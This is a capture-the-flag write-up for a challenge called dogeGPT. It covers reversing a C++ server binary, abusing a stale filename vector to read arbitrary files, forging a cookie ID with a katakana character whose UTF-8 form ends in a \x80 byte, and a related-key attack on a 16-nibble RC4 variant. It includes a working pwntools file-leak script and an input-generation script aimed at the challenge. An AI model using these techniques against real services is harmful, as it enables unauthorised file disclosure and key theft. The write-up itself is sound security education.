
Level 10: dogeGPT (rev, pwn, web, crypto)

After registering at the challenge website, we are redirected to /start.php, which has a button that starts the dogeGPT service. The service is then accessible over a TCP connection.


The service allows us to start a chat and enter a prompt, which 'dogeGPT' will respond to.


We can also display a help menu, but it seems useless. There is also an option to get dogekey, but it doesn't seem to do anything.


Digging deeper into start.php, we find an HTML comment referencing a 'files.php' endpoint and a 'decrypt-flag.php' endpoint.

html
<!-- 
    lol i forgot to delete a comment 
    <a href="/files.php">Download dogeGPT here!</a><br><br>
    <a href="/decrypt-flag.php">Shutdown dogeGPT and retrieve flag here :(</a>
 -->

Heading over to /files.php, we can download the dogeGPT.exe binary. The /files.php endpoint also leaks the location of the source code as C:\lmao\weird\folder\htdocs\files.php via an error message.


Inspecting cookies, we can observe that a cookie u is set. Its value appears to be:

py
base64_encode(username + "\x80" + md5_hex(username)[:16])

For example, registering as admin gives YWRtaW6AMjEyMzJmMjk3YTU3YTVhNw== which decodes to admin\x8021232f297a57a5a7.
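A quick way to double-check the cookie format is to rebuild the admin example locally. This is a minimal sketch that assumes the username is hashed as its UTF-8 bytes; make_cookie is just a helper name used here:

```python
import base64
import hashlib


def make_cookie(username: str) -> str:
    """Rebuild the u cookie: username + 0x80 + first 16 hex chars of md5(username)."""
    raw = username.encode("utf-8")
    h = hashlib.md5(raw).hexdigest()[:16]
    return base64.b64encode(raw + b"\x80" + h.encode()).decode()


print(make_cookie("admin"))  # YWRtaW6AMjEyMzJmMjk3YTU3YTVhNw==
```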

Rev

Opening up the dogeGPT.exe binary in IDA, we quickly realize that it is a C++ executable (the .i64 file can be found here). I'll be referring to functions and global variables as I named them in IDA.

We define the following structs in IDA to help us better understand the code:

c
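struct cpp_str {
    char* ptr;
    char extra_data[8];
    unsigned __int64 length;   // 64-bit: `long` is only 4 bytes under MSVC
    unsigned __int64 cap;      // named `cap` to match the decompiled code below
};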

If the string is shorter than 16 bytes (cap < 16), it is stored inline in the 16 bytes spanned by ptr and extra_data. Otherwise, the string is stored on the heap and ptr points to it. This is the layout of MSVC's std::string.
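When reading these strings out of a debugger or memory dump, the decompiled code's `cap >= 0x10` test is exactly what decides where the characters live. A minimal sketch, assuming a 32-byte little-endian x64 dump of the struct; read_cpp_str and the read_mem callback are hypothetical names:

```python
import struct


def read_cpp_str(raw: bytes, read_mem=None) -> bytes:
    """Decode a 32-byte cpp_str dump (x64, little-endian).

    read_mem(addr, n) is a hypothetical callback returning n bytes at addr
    (e.g. backed by a debugger); it is only needed for heap-allocated strings.
    """
    buf = raw[:16]                                  # ptr + extra_data
    length, cap = struct.unpack("<QQ", raw[16:32])
    if cap >= 0x10:                                 # heap mode: first 8 bytes are a pointer
        (ptr,) = struct.unpack("<Q", buf[:8])
        return read_mem(ptr, length)
    return buf[:length]                             # inline (small string) mode


small = b"help.txt".ljust(16, b"\0") + struct.pack("<QQ", 8, 15)
print(read_cpp_str(small))  # b'help.txt'
```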

c
struct cpp_str_arr {
    cpp_str* start;
    cpp_str* end;
    cpp_str* limit;
};

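This struct is MSVC's std::vector<std::string>: start points at the first element, end one past the last element, and limit at the end of the allocated storage. If end == limit, the array is reallocated to accommodate more cpp_strs.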
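In a debugger, the element count and capacity fall straight out of the three pointers. A sketch that assumes 32-byte elements (the size of an MSVC x64 std::string) and a raw little-endian dump of the struct; vector_info is a hypothetical helper:

```python
import struct

CPP_STR_SIZE = 32  # 8 (ptr) + 8 (extra_data) + 8 (length) + 8 (cap)


def vector_info(raw: bytes):
    """Return (size, capacity, next_push_reallocates) for a dumped cpp_str_arr."""
    start, end, limit = struct.unpack("<QQQ", raw[:24])
    size = (end - start) // CPP_STR_SIZE
    capacity = (limit - start) // CPP_STR_SIZE
    return size, capacity, end == limit


print(vector_info(struct.pack("<QQQ", 0x1000, 0x1040, 0x1060)))  # (2, 3, False)
```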

After some debugging and trial and error, I realized that the program required 4 arguments. The second argument is the IP to accept connections from, and the fourth is the port to listen on.

The purpose of the first and third arguments will be discussed later.

Tracing the execution flow for input get dogekey leads us to read_keyfile.

c
cpp_str *__fastcall read_keyfile(cpp_str *output)
{
  cpp_str *v2; // rax
  cpp_str *v3; // rax
  __int64 v4; // rdx
  cpp_str *v5; // rax
  cpp_str *v6; // rax
  char *ptr; // rcx
  char *v8; // rcx
  cpp_str Block; // [rsp+20h] [rbp-78h] BYREF
  cpp_str *v11; // [rsp+48h] [rbp-50h]
  cpp_str v12; // [rsp+50h] [rbp-48h] BYREF
  cpp_str v13; // [rsp+70h] [rbp-28h] BYREF

  v11 = output;
  if ( key_flag )
  {
    v2 = copy(&v13, &key_filename);
    v3 = read_whole_file(&v12, (__int64)v2);
    v5 = concat2(v3, v4, "Congrats! The dogekey has been encrypted! It is: ", 0x31ui64);
    memset(&Block, 0, sizeof(Block));
    Block = *v5;
    v5->length = 0i64;
    v5->cap = 15i64;
    LOBYTE(v5->ptr) = 0;
    v6 = append(&Block, "\n", 1ui64);
    // output 
  }
  else
  {
    *(_OWORD *)&output->ptr = 0i64;
    output->length = 0i64;
    output->cap = 0i64;
    append_str(output, "\n", 1ui64);
  }
  return output;
}

If the key_flag global variable is not set, the function returns just a newline, which explains why nothing seems to happen when we enter get dogekey. If key_flag is set, the file referenced by key_filename is read and its contents are sent to the user after the "Congrats!" message.

Searching for references to key_flag leads us to this fragment of code in print_doge:

c
v6 = copy(&out, input);  
hash(&v163, (__int64)v6);
last = get_first_(&v163, &hash_subset, 0i64, 0x10ui64);
v8 = memcmp_hash(last);
reset_str(&hash_subset);
v9 = key_flag;
if ( v8 )
	v9 = 1;
key_flag = v9;

hash computes the MD5 hash of the input and writes it hex-encoded to v163. get_first_ then copies the first 0x10 characters of the hash into hash_subset, and memcmp_hash compares them with the third argument to the program (stored in the global variable hash_val). If they match, key_flag is set, and it stays set for all later inputs.

Hmm, this seems quite similar to the u cookie we discovered earlier, which contains the first 16 characters of the md5 hash of our username. Maybe hash_val is also the first 16 characters of the md5 hash of our username?

This is confirmed when we enter our username, followed by get dogekey: the string Congrats! The dogekey has been encrypted! It is: is printed, indicating that key_flag has been set.
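Put together, the key_flag check boils down to the following. A minimal sketch, assuming the input line is hashed without its trailing newline; hash_val_for and sets_key_flag are illustrative names:

```python
import hashlib


def hash_val_for(username: bytes) -> str:
    # For a normal cookie, this is the third argument dogeGPT.exe receives
    return hashlib.md5(username).hexdigest()[:16]


def sets_key_flag(line: bytes, hash_val: str) -> bool:
    # Mirrors hash() + get_first_(..., 0x10) + memcmp_hash()
    return hashlib.md5(line).hexdigest()[:16] == hash_val


print(sets_key_flag(b"admin", hash_val_for(b"admin")))  # True
```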

However, the dogekey has still not been revealed. This is because the key_filename variable has not been set. Searching for references to key_filename, we find the gen_keyfilename function which is called in print_doge:

c
if ( (unsigned __int16)result_accumulator == (_DWORD)v159 )
	gen_keyfilename(v140, v139, v141);

Using a debugger, we can observe that result_accumulator is initialized to 0xd06e and v159 is the integer value represented by the last 4 hex characters of hash_val (which is the first 16 characters of the md5 hash of our username). Because of the (unsigned __int16) cast, only the low 16 bits of result_accumulator take part in the comparison.

Searching for references to result_accumulator leads us to spawn_process, where our input is passed to the C:\dogeGPT\parser.py program:

c
join(
    &lpCommandLine,
    (__int64)input,
    a3,
    "C:\\Progra~1\\Python311\\python.exe c:\\dogeGPT\\parser.py ",
    0x36ui64,
    ptr,
    input->length
);

// ...

if ( !CreateProcessA(0i64, p_lpCommandLine, 0i64, 0i64, 1, 0x10u, 0i64, 0i64, &StartupInfo, &ProcessInformation) )
{
  CloseHandle(hWritePipe);
  CloseHandle(hReadPipe);
LABEL_5:
  v6 = 0i64;
  goto LABEL_6;
}

The output of the process is then parsed:

c
if ( Buf.length && (v16 = memchr(process_output, ',', Buf.length)) != 0i64 )
  comma_index = (_DWORD)v16 - (_DWORD)process_output;
else
  comma_index = -1;
v18 = (char *)&Buf;
if ( Buf.cap >= 0x10ui64 )
  v18 = Buf.ptr;
if ( length && (v19 = memchr(v18, '\r', length)) != 0i64 )
  newline_index = (_DWORD)v19 - (_DWORD)v18;
else
  newline_index = -1;
if ( comma_index && newline_index )
{
  memset(&v48, 0, sizeof(v48));
  v21 = comma_index;
  if ( length < comma_index )
    v21 = length;
  v22 = (char *)&Buf;
  if ( Buf.cap >= 0x10ui64 )
    v22 = Buf.ptr;
  append_str(&v48, v22, v21);
  after_comma = comma_index + 1;
  memset(&String, 0, sizeof(String));
  if ( Buf.length < after_comma )
    invalid_strpos();
  num_len = newline_index - comma_index - 1;
  if ( Buf.length - after_comma < num_len )
    num_len = Buf.length - after_comma;
  buf_ptr = (char *)&Buf;
  if ( Buf.cap >= 0x10ui64 )
    buf_ptr = Buf.ptr;
  append_str(&String, &buf_ptr[after_comma], num_len);
  v26 = errno();
  v27 = v26;
  p_String = (char *)&String;
  if ( String.cap >= 0x10ui64 )
    p_String = String.ptr;
  *v26 = 0;
  v29 = strtol(p_String, (char **)NumberOfBytesRead, 10);
  if ( p_String == *(char **)NumberOfBytesRead )
  {
    std::_Xinvalid_argument("invalid stoi argument");
    __debugbreak();
  }
  if ( *v27 == 34 )
  {
    std::_Xout_of_range("stoi argument out of range");
    __debugbreak();
  }
  result_accumulator += v29;
  // ...
}

Here's a rough Python equivalent of that long, confusing chunk of code:

python
s, i = process_output.split(",")[:2]
result_accumulator += int(i)

From this, we can infer that parser.py outputs something in the form of string,integer. The integer portion of the output is parsed and added to result_accumulator. It seems that the string portion of the output is our input string. Therefore, if our input string contains a , character followed by an integer, we can control the value of v29 and thus the value of result_accumulator. Since we know the target value that result_accumulator needs to be and the initial value, we can calculate the input required to reach the target.
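The arithmetic can be sketched as follows. Because the comparison casts result_accumulator to unsigned __int16, working modulo 0x10000 should mean no username needs to be discarded for having a small last-4-digit value (the script in this writeup rejects those). This assumes the username line contributes 0 and that parser.py echoes our word,number token back, as observed; required_offset and second_input are illustrative names:

```python
ACC_INIT = 0xD06E  # observed initial value of result_accumulator


def required_offset(hash_val: str) -> int:
    target = int(hash_val[-4:], 16)  # v159: last 4 hex digits of hash_val
    # Only the low 16 bits are compared, so any offset congruent mod 0x10000 works
    return (target - ACC_INIT) % 0x10000


def second_input(hash_val: str, word: str = "awyuyruyuyrueure") -> str:
    return f"{word},{required_offset(hash_val)}"


print(second_input("ec6b23e906d9ee77"))  # awyuyruyuyrueure,7689
```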

I wrote a script to generate inputs that satisfy both conditions, setting key_flag and key_filename:

python
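from pwn import *  # provides md5sum()
import random
import string

ACC_INIT = 0xd06e  # initial value of result_accumulator


def get5():
    # random 5-letter prefix for a candidate username
    return "".join(random.choice(string.ascii_letters) for _ in range(5)).encode()


def gen(a):
    h16 = md5sum(a).hex()[:16]  # becomes hash_val (the program's third argument)
    h = int(h16[-4:], 16)       # the value result_accumulator must reach
    if h < ACC_INIT:
        return False            # keep the required offset non-negative
    return h16, a, f"awyuyruyuyrueure,{h - ACC_INIT}"


def gen_rnd():
    res = False
    while not res:
        # the ",0" suffix makes the username itself add 0 to result_accumulator
        res = gen(get5() + b",0")
    return res


print(gen_rnd())  # (hash_val, username, second input)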

One possible input combination is username = lUArf,0 and subsequent input awyuyruyuyrueure,7689. Since the first 16 characters of the md5 hash of lUArf,0 are ec6b23e906d9ee77 and 7689 + 0xd06e = 0xee77, the gen_keyfilename function is called. The username needs to end in ,0 so that entering it does not change result_accumulator.

Entering lUArf,0 and awyuyruyuyrueure,7689 after registering as lUArf,0 results in the dogekey being printed, but unfortunately this doesn't bring us much closer to the flag.

get dogekey
Congrats! The dogekey has been encrypted! It is: 89abe660cba142e3e8b2861ca5e8b81a

Upon further debugging, it appears that the dogekey is the first argument of the binary and is written to C:\dogeGPT\<ip>-<username hash> when the gen_keyfilename function is called.

Pwn

After a week of reversing and debugging the binary, I noticed some very strange behavior. In the start_server function, the load_files function is called when the user connects to the dogeGPT process. This loads the path of the help file and the paths of the wordlists used to generate dogeGPT responses into a global filenames variable (which is a cpp_str_arr).

Interestingly, in the process_input function, user input is also appended to this array, even though it is not a filename:

c
if ( filenames.end == filenames.limit )
{
    copy_with_resize(&filenames, filenames.end, input);
    end = filenames.end;
}
else
{
    copy(filenames.end, input);
    end = ++filenames.end;
}

This results in filenames holding a mix of user input and actual filenames.

Upon ending chat, the filenames array is reset:

c
if ( filenames.start != end )
{
  delete_string_range(filenames.start, end);
  filenames.end = filenames.start;
}
files_loaded = 0;
cleanup_keyfile();
v18 = 15i64;
v19 = "Ending chat...\n";

However, the help menu still works after the chat has ended:

c
v8 = copy(&v26, filenames.start);
v9 = read_whole_file(&Block, (__int64)v8);
v10 = append(v9, "\n", 1ui64);
*(_OWORD *)&output->ptr = 0i64;
output->length = 0i64;
output->cap = 0i64;
*output = *v10;

It reads the file whose name is stored at filenames.start and returns its contents to the user. Normally this is the help file, because help.txt is the first file that's loaded.

However, since the filenames array was reset when the chat was ended, filenames.start no longer contains help.txt but our user input! Therefore, we can trick the program into exposing arbitrary files.
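To make the bug concrete, here is a toy Python model of the relevant state. It is a simplification, not the binary's code: the placeholder filenames, the canned replies and the assumption that each line is pushed before it is handled are all mine.

```python
class DogeModel:
    """Toy model of dogeGPT's global filenames vector (illustrative only)."""

    def __init__(self):
        # load_files(): help file first, then the wordlists (placeholder names)
        self.filenames = ["help.txt", "words.txt"]

    def process_input(self, line):
        self.filenames.append(line)      # user input is pushed as well
        if line == "end chat":
            self.filenames.clear()       # filenames.end = filenames.start
            return "Ending chat..."
        if line == "help":
            # help reads whatever filename sits at filenames.start
            return f"<contents of {self.filenames[0]}>"
        return "wow"


model = DogeModel()
model.process_input("end chat")
model.process_input(r"C:\lmao\weird\folder\htdocs\start.php")
print(model.process_input("help"))  # <contents of C:\lmao\weird\folder\htdocs\start.php>
```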

We can use this vulnerability to leak parser.py, as well as start.php, which is responsible for starting the dogeGPT service:

py
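from pwn import *
import sys

ip, port = sys.argv[1], sys.argv[2]  # address and port of our dogeGPT instance
r = remote(ip, int(port))

path = rb"C:\lmao\weird\folder\htdocs\start.php"
r.sendline(b"end chat")            # resets filenames (end = start)
r.sendlineafter(b"...", path)      # our input becomes filenames.start
r.sendlineafter(b"...", b"help")   # help reads the file named at filenames.start
pause(1)                           # give the service a moment to respond
data = r.clean()
print(data.decode())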

Web

After leaking index.php using the bug described in the previous section, we find the following code used to generate the u cookie:

php
$str = $_POST['uname'];
if (!preg_match("/[\p{N}\p{Z}\p{L}\p{M}]*/u",$str) || $str == "") {
    echo("Bad username!!<br>");
    die();
}
$h = substr(md5($str),0,16);
$uid = base64_encode($str . "\x80" . $h);
setcookie("u", $uid, time()+60);

As expected, uid is a base64 string consisting of the username concatenated with \x80 and the first 16 characters of the md5 hash of the username.

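Using regex101 to explain the regex, \p{L} matches 'any kind of letter from any language'. Note that the pattern has no anchors and uses *, so it matches (an empty string, if nothing else) in any valid UTF-8 input. The check that actually bites is the /u modifier, which makes preg_match fail on invalid UTF-8, so a raw \x80 byte on its own is rejected. Luckily, the code point U+FF80 is タ (HALFWIDTH KATAKANA LETTER TA), whose UTF-8 encoding is EF BE 80. It is valid UTF-8, yet its last byte is \x80, which lets us inject the \x80 separator and supply a fake md5 hash. To see why this is important, let's look at start.php: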

php
$aa = explode("\x80", base64_decode($uid));
if (!preg_match("/^[\da-f]+$/u",$aa[1])) {
    header("Location: /");
    die();
}
$uid = substr($aa[1],0,16);
exec("reg query HKCU\dogeGPT\ -v pri_key", $a1);
$pri = explode("    ", $a1[2])[3];

exec("reg query HKCU\dogeGPT\ -v dogekey", $a2);
$f = explode("    ", $a2[2])[3];        

$ef = enc($pri, $uid, $f);

$ip = $_SERVER['REMOTE_ADDR'];
$pt = rand(20000, 47000);
proc_open("C:\\dogeGPT\\dogeGPT.exe " . $ef . " " . $ip . " " . $uid . " " . $pt, [0=>["pipe","r"]], $p);

The $uid is used as an input to the enc function which generates $ef which is used as the 'encrypted dogekey' referred to by dogeGPT.exe. By using the unicode trick explored above, we can set $uid to any 16 character hexadecimal string we want.
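The trick can be checked offline by mirroring the cookie construction in index.php and the explode in start.php. A minimal sketch; the function names and the "doge" prefix are arbitrary choices, and the fake uid must be lowercase hex to pass start.php's /^[\da-f]+$/u check:

```python
import base64
import hashlib

TA = "\uff80"  # HALFWIDTH KATAKANA LETTER TA, UTF-8 bytes EF BE 80


def forged_username(fake_uid: str, prefix: str = "doge") -> str:
    return prefix + TA + fake_uid


def cookie_for(username: str) -> bytes:
    # index.php: base64(username . "\x80" . substr(md5(username), 0, 16))
    raw = username.encode("utf-8")
    return base64.b64encode(raw + b"\x80" + hashlib.md5(raw).hexdigest()[:16].encode())


def uid_seen_by_start_php(cookie: bytes) -> str:
    # start.php: explode("\x80", base64_decode($uid)), then substr($aa[1], 0, 16)
    parts = base64.b64decode(cookie).split(b"\x80")
    return parts[1][:16].decode()


print(uid_seen_by_start_php(cookie_for(forged_username("0" * 16))))  # 0000000000000000
```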

Crypto

The enc function is defined in encrypt.php. It's quite long, so here's a simple python implementation:

py
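def encrypt(prikey, uid, data):
    # prikey, uid: lists of 16 nibbles (0-15); data: list of nibbles
    # Key scheduling: RC4's KSA over a 16-entry state
    sbox = list(range(16))
    key = [(x + y) % 16 for x, y in zip(prikey, uid)]  # effective key = prikey + uid (mod 16)
    j = 0
    for i in range(16):
        j = (j + sbox[i] + key[i]) % 16
        sbox[i], sbox[j] = sbox[j], sbox[i]

    # Output generation: RC4's PRGA, again modulo 16
    i = 0
    j = 0
    out = []
    for k in range(len(data)):
        i = (i + 1) % 16
        j = (j + sbox[i]) % 16
        sbox[i], sbox[j] = sbox[j], sbox[i]
        keychar = (sbox[i] + sbox[j]) % 16
        out.append(data[k] ^ sbox[keychar])  # XOR one nibble of keystream
    return out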

If you're well versed in crypto, you'll recognize this as a variant of RC4, except that the sbox has been reduced to 16 hexadecimal digits (8 bytes) instead of the 256 bytes of full RC4. We can also influence the key used to initialize the sbox: each key nibble is (prikey + uid) mod 16, and we control uid.
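This is what makes the Web step useful: by choosing uid we can add any difference we like to the secret key, which is exactly a related-key setting. A sketch of that relationship, assuming enc() maps each hex digit of $uid to one nibble (not confirmed beyond uid=0); all helper names here are hypothetical:

```python
def uid_nibbles(uid_hex):
    # Assumption: enc() treats each hex digit of $uid as one nibble
    return [int(c, 16) for c in uid_hex]


def effective_key(prikey, uid_hex):
    # The only key material the key schedule ever sees
    return [(p + u) % 16 for p, u in zip(prikey, uid_nibbles(uid_hex))]


def uid_for_delta(delta):
    # The uid that adds `delta` (mod 16) to the secret key, nibble by nibble
    return "".join(f"{d % 16:x}" for d in delta)


secret = list(range(16))      # stand-in for the unknown private key
delta = [0] * 15 + [3]        # change only the last key nibble by +3
k0 = effective_key(secret, "0" * 16)
k1 = effective_key(secret, uid_for_delta(delta))
print([(b - a) % 16 for a, b in zip(k0, k1)])
```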

Since I'm quite bad at crypto, I was stuck at this stage for a while, until the challenge author prompted me to explore the system further.

This led me to look deeper at parser.py:

python
import sys
import requests
import openai

text = ""
for i in range(len(sys.argv)):
	if i > 0: 
		text = text + sys.argv[i] + " "

response = openai.ChatComplete.create(model="doge-gpt-0.1", messages=text)
c = 0
if len(response) != 0:
	for i in range(requests.get_len() // len(text)):
		if requests.is_sus(i):
			c += i
	print(response[c % len(response)]+","+str(c))
else:
	print(",0")

Obviously, requests is not the real requests library, since the real library doesn't have a requests.is_sus method. Reading the requests.py file revealed the following QR code:

py
m  = "@@@@@@@  @@  @  @     @@@@@@@"
m += "@     @ @@ @  @@@@ @  @     @"
m += "@ @@@ @   @  @@ @ @   @ @@@ @"
m += "@ @@@ @  @ @ @@@ @@@@ @ @@@ @"
m += "@ @@@ @ @  @@ @  @@@  @ @@@ @"
m += "@     @    @ @   @@@  @     @"
m += "@@@@@@@ @ @ @ @ @ @ @ @@@@@@@"
m += "         @@  @@ @@ @         "
m += "@ @ @ @   @@@ @@ @ @    @  @ "
m += "@@ @@   @ @   @@  @ @ @  @  @"
m += "  @ @@@@ @ @ @   @@  @@ @ @@@"
m += "   @   @       @ @         @ "
m += "@ @@  @    @@   @@  @ @@ @ @@"
m += "     @ @@  @ @ @@@@@@@@  @  @"
m += "@@ @ @@@@@@@  @@@@   @ @@@ @@"
m += "@@   @ @@ @@ @@ @@@ @@@  @ @ "
m += "@ @@  @     @ @@    @@@@ @ @@"
m += " @@ @     @@@ @@   @@@@  @@ @"
m += "@ @ @@@   @@ @   @  @ @@   @@"
m += " @@ @      @   @ @@  @@ @@ @ "
m += "@  @ @@ @@@ @   @@@ @@@@@    "
m += "        @@   @ @@ @ @   @ @@@"
m += "@@@@@@@    @@ @@@ @@@ @ @@ @@"
m += "@     @   @@ @@ @@  @   @@ @ "
m += "@ @@@ @ @@    @@  @ @@@@@  @ "
m += "@ @@@ @  @    @@    @  @@ @  "
m += "@ @@@ @ @@ @@@   @ @   @@@  @"
m += "@     @  @ @@  @   @@      @ "
m += "@@@@@@@ @   @@@ @   @@@  @ @@"

def is_sus(i):
	return(m[i % len(m)] == "@")

def get_len():
	return(len(m))

A scannable version of the QR code can be found here.
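To scan the QR codes yourself, the m strings can be turned into an image. A minimal sketch that writes a plain PBM (P1) bitmap, assuming m is a flattened square grid with '@' for dark modules, as in requests.py and numpy.py; qr_rows, to_pbm and the 4-module quiet-zone border are illustrative choices:

```python
import math


def qr_rows(m):
    n = math.isqrt(len(m))
    assert n * n == len(m), "expected a square QR code"
    return [m[k:k + n] for k in range(0, len(m), n)]


def to_pbm(m, border=4):
    # Plain PBM: "1" is black, "0" is white; whitespace in the raster is optional
    rows = qr_rows(m)
    size = len(rows) + 2 * border
    blank = "0" * size
    bitmap = [blank] * border
    for row in rows:
        bits = "".join("1" if c == "@" else "0" for c in row)
        bitmap.append("0" * border + bits + "0" * border)
    bitmap += [blank] * border
    body = "\n".join(bitmap)
    return f"P1\n{size} {size}\n{body}\n"
```

Writing to_pbm(m) to a .pbm file gives one pixel per module, so zoom in generously before pointing a phone at it.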

I figured the challenge would not be making real (paid) requests to OpenAI, so the openai library it imports was probably fake too. Indeed it was:

py
import nltk
import numpy

class ChatComplete:
	def create(model, messages):
		text = nltk.word_tokenize(messages)
		tags = nltk.pos_tag(text)
		stuff = []
		for tag in tags:
			if tag[1] == "NN" or tag[1] == "NNP":
				if numpy.is_sus(len(tag[0])*len(tags)):
					stuff.append(tag[0])
					stuff.append(tag[0])
					stuff.append(tag[0])
				else:
					stuff.append(tag[0])
					stuff.append(tag[0])
			if tag[1] == "VBG" or tag[1] == "JJ":
				if numpy.is_sus(len(tag[0])*len(tags)):
					stuff.append(tag[0])
					stuff.append(tag[0])
				else:
					stuff.append(tag[0])
					stuff.append(tag[0])
					stuff.append(tag[0])					
			if tag[1] == "VB":
				if numpy.is_sus(len(tag[0])*len(tags)):
					stuff.append(tag[0])
		return stuff

This revealed the use of the nltk library (which was legitimate) and the numpy library, which was fake as well and contained the following QR code:

python
m  = "@@@@@@@   @ @@    @@@@@@@"
m += "@     @ @ @  @@@@ @     @"
m += "@ @@@ @     @     @ @@@ @"
m += "@ @@@ @ @@@ @@@@@ @ @@@ @"
m += "@ @@@ @  @    @ @ @ @@@ @"
m += "@     @ @@ @@  @@ @     @"
m += "@@@@@@@ @ @ @ @ @ @@@@@@@"
m += "         @@@   @@        "
m += "@@@@@ @@@@ @ @@@@@ @ @ @ "
m += " @@@@@ @  @ @   @@ @ @@  "
m += " @ @@ @ @ @   @@@@@  @ @@"
m += "@ @ @@ @@   @    @ @@   @"
m += "   @@@@  @@ @@@@@@@@  @@ "
m += "@@@@@  @@@      @  @   @@"
m += "@ @@@@@@ @@@@@@@@@@@@@ @@"
m += "@ @ @     @@   @@@       "
m += "@  @ @@@  @@    @@@@@@@@ "
m += "        @@  @@ @@   @    "
m += "@@@@@@@ @    @@ @ @ @@  @"
m += "@     @  @  @@ @@   @  @@"
m += "@ @@@ @ @@  @ @@@@@@@@@@@"
m += "@ @@@ @ @@@    @ @@@@ @@@"
m += "@ @@@ @ @@ @@  @   @  @ @"
m += "@     @ @  @  @ @@ @@   @"
m += "@@@@@@@ @@ @      @  @@@@"

def is_sus(i):
	return(m[i % len(m)] == "@")

That QR code decodes to .\htdocs\welp-sus.pdf, which corresponds to http://13.251.171.1/welp-sus.pdf.

That PDF is the first page of A New Practical Key Recovery Attack on the Stream Cipher RC4 under Related-Key Model, which seems to be exactly the attack to use in this case.

My implementation of the attack can be found here: attack.py, worker.py, get_encryption.py. I used 4 worker processes to speed things up and after a couple of hours, the full key was leaked:

[12, 3, 9, 0, 12, 2, 11, 10, 12, 4, 10, 3, 12, 6, 9, 0]

Next, I obtained the encrypted dogekey with uid=0:

9e51eafb37f35cd7b8ada161c19e875c

and decrypted it using the leaked key to reveal the following decrypted dogekey:

600d715cf1a6baadd06e10000d011a55
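Since the cipher only XORs a keystream into the data, decryption is the same operation as encryption. A self-contained sketch, assuming the dogekey is handled as 32 hex digits (one nibble each) and that uid=0 means sixteen 0 digits; nibble_rc4 and decrypt_hex are illustrative names:

```python
def nibble_rc4(key, nibbles):
    # 16-entry RC4 variant from encrypt.php
    s = list(range(16))
    j = 0
    for i in range(16):
        j = (j + s[i] + key[i]) % 16
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = []
    for n in nibbles:
        i = (i + 1) % 16
        j = (j + s[i]) % 16
        s[i], s[j] = s[j], s[i]
        out.append(n ^ s[(s[i] + s[j]) % 16])
    return out


def decrypt_hex(prikey, uid_hex, ct_hex):
    key = [(p + int(u, 16)) % 16 for p, u in zip(prikey, uid_hex)]
    pt = nibble_rc4(key, [int(c, 16) for c in ct_hex])
    return "".join(f"{n:x}" for n in pt)


prikey = [12, 3, 9, 0, 12, 2, 11, 10, 12, 4, 10, 3, 12, 6, 9, 0]
print(decrypt_hex(prikey, "0" * 16, "9e51eafb37f35cd7b8ada161c19e875c"))
```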

Reading decrypt-flag.php, it seems that a check has been added to only allow local access:

php
<?php
    if ($_SERVER['REMOTE_ADDR'] != "127.0.0.1") {
        header("HTTP/1.1 401 Unauthorized");
        echo "<h1>401 Unauthorized: Access Denied LMAO</h1>";
        die;
    }
    $flag = "";
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $enc_flag = "cHAwNlJXZ3hYY0V1TmVyK3VacEN2NVdwNUhZRGh2ZFFUa1JQVlp2M1ByWT0=";
        $key = $_POST['dogekey'];
        for ($i = 0; $i < 0xffffff; $i++) {
            $key = hash('sha256', $key);
        }
        $cipher = "aes-256-cbc";

        $flag = openssl_decrypt(base64_decode($enc_flag), $cipher, $key);
    }
?>
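The key derivation in decrypt-flag.php is easy to reproduce outside PHP. A minimal sketch of just the hashing loop (derive_key is a name used here): PHP's hash('sha256', ...) returns a lowercase hex string, and that string is what gets hashed in the next round. With the default 0xffffff rounds, expect this to take a while in pure Python. Feeding the result into AES-256-CBC the way openssl_decrypt does also depends on PHP-specific details (how an over-long key and the missing IV are handled, and the fact that openssl_decrypt base64-decodes its input again unless OPENSSL_RAW_DATA is passed), which is why simply running the PHP is the pragmatic route.

```python
import hashlib


def derive_key(dogekey: str, rounds: int = 0xFFFFFF) -> str:
    # PHP: for ($i = 0; $i < 0xffffff; $i++) $key = hash('sha256', $key);
    key = dogekey
    for _ in range(rounds):
        key = hashlib.sha256(key.encode()).hexdigest()
    return key
```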

Since the check only restricts the client address, we can run decrypt-flag.php on a local PHP web server, visit it from 127.0.0.1 and enter the decrypted dogekey, and the flag is returned:

TISC{5UCH_@I_V3RY_IF_3153_W0W}